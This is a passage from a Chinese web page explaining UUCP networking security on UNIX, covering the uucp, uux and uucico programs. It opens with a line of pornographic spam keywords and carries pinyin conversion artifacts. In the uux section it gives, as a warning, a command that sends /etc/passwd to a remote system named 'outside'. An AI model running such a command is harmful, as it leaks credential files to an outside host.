日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

網(wǎng)絡(luò)安全

【網(wǎng)絡(luò)安全】
本文主要討論網(wǎng)絡(luò)和數(shù)據(jù)通訊安全,分為六個部分.第一部分概述最大,最老
的Unix網(wǎng)絡(luò)UUCP系統(tǒng);第二部分討論UUCP的安全;第三部分討論新HONEY DANBER
UUCP及安全特點;第四部分討論其它的UNIX網(wǎng)絡(luò),其中包括RJE和NSC;第五部分討
論通訊的物理安全;最后一部分討論Sun Microsystem公司的Sun OS系統(tǒng)的網(wǎng)絡(luò)
安全.

1.UUCP系統(tǒng)概述
UUCP系統(tǒng)是一組程序,完成文件傳輸,執(zhí)行系統(tǒng)之間的命令,維護(hù)系統(tǒng)使用情
況的統(tǒng)計,保護(hù)安全.UUCP是UNIX系統(tǒng)最廣泛使用的網(wǎng)絡(luò)實用系統(tǒng),這其中在兩個
原因:第一,UUCP是各種UNIX版本都可用的唯一的標(biāo)準(zhǔn)網(wǎng)絡(luò)系統(tǒng),第二,UUCP是最
便宜的網(wǎng)絡(luò)系統(tǒng).只需要一根電纜連接兩個系統(tǒng),然后就可建立UUCP.如果需要在
相距數(shù)百或數(shù)千公里遠(yuǎn)的兩個系統(tǒng)間傳輸數(shù)據(jù),中需要兩個具有撥號功能的調(diào)制
解調(diào)器.

(1)UUCP命令
UUCP命令之一是uucp,該命令用于兩系統(tǒng)間的文件傳輸,uucp命令格式類
似于cp命令的格式,只是uucp允許用戶有系統(tǒng)間拷貝文件,命令的一般格式如
下:
uucp source_file destination_file
source_file通常是本系統(tǒng)的文件(但不必一定是),destination_file通
常是另一系統(tǒng)的文件或目錄.指定destination_file的格式為:
system!filename或system!Directory.
uucp給系統(tǒng)管理員提供了一個選項,可以限制傳入和傳出本系統(tǒng)的uucp文
件只能傳到/usr/spool/uucppublic目錄結(jié)構(gòu)中.若告訴uucp將傳輸?shù)奈募?
放在其他目錄中,系統(tǒng)將會送回一個郵件:remote access to path / file
denIEd. uucp允許以簡化符號~代替/usr/spool/uucppublic/.如:
uucp names remote!~/john/names
有時也可用uucp將文件從另一個系統(tǒng)拷貝到本系統(tǒng),只要將要傳入本系統(tǒng)
的文件指定為源文件(用system!file)即可,如:
uucp remotes!/usr/john/file1 file1
如果在遠(yuǎn)地機限制了文件傳輸?shù)哪夸?上條命令不能拷貝到文件.拷貝文
件到本系統(tǒng)的最安全的方法是:在兩個系統(tǒng)上都通過uucppublic目錄進(jìn)行文件
傳輸:
uucp remotes!~/john/file1 ~/pat/file1

(2)uux命令
uux命令可用于在另一個系統(tǒng)上執(zhí)行命令,這一特點稱為"遠(yuǎn)程命令仞行".
uux最通常的用處是在系統(tǒng)之間發(fā)送郵件(mail在其內(nèi)部執(zhí)行uux).典型的uux
請求如下:
pr listing| uux - "remote1!lp -d pr1"
這條命令將文件listing格式編排后,再連接到系統(tǒng)remote1的打印機pr1
上打印出來.uux的選項"-"使uux將本命令的標(biāo)準(zhǔn)輸入設(shè)備建立為遠(yuǎn)程命令的
標(biāo)準(zhǔn)輸入設(shè)備.當(dāng)若干個系統(tǒng)中只有一個系統(tǒng)連接了打印機時,常用uux打印文
件.
當(dāng)然必須嚴(yán)格地限制遠(yuǎn)程命令招待,以保護(hù)系統(tǒng)安全.如:
本系統(tǒng)不應(yīng)允許其它系統(tǒng)上的用戶運行下面的命令:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
這條命令將使本系統(tǒng)傳送/etc/passwd文件到系統(tǒng)outside上,一般地,只
有幾條命令允許地執(zhí)行.rmail是加限制的mail程序,常常為允許通過uux執(zhí)行
的命令之一.也允許rnews(加限制的netnews偽脫機命令)在運行netnews的系
統(tǒng)上執(zhí)行,還允許lp在提供了打印設(shè)備的系統(tǒng)上運行.

(3)uucico程序
uucp和uux命令實際上并不調(diào)用另一個系統(tǒng)及傳送文件和執(zhí)行命令,而是
將用戶的請求排入隊列,并啟動uucico程序.uucico完成實際的通訊工作.它調(diào)
用其它的系統(tǒng),登錄,傳送數(shù)據(jù)(可以是文件或請求遠(yuǎn)程命令執(zhí)行).如果電話線
忙,或其它系統(tǒng)已關(guān)機,傳輸請求仍針保留在隊列中,uucico后續(xù)的職能操作
(通常是cron完成)將發(fā)送這些傳輸請求.
uucico完成數(shù)據(jù)的發(fā)送和接收.在本系統(tǒng)的/etc/passwd文件中,有其它系
統(tǒng)的uucico登錄進(jìn)入本系統(tǒng)的入口項,該入口項中指定的缺省shell是uucico.
因此,其它系統(tǒng)調(diào)用本系統(tǒng)時,直接與uucico對話.

推薦閱讀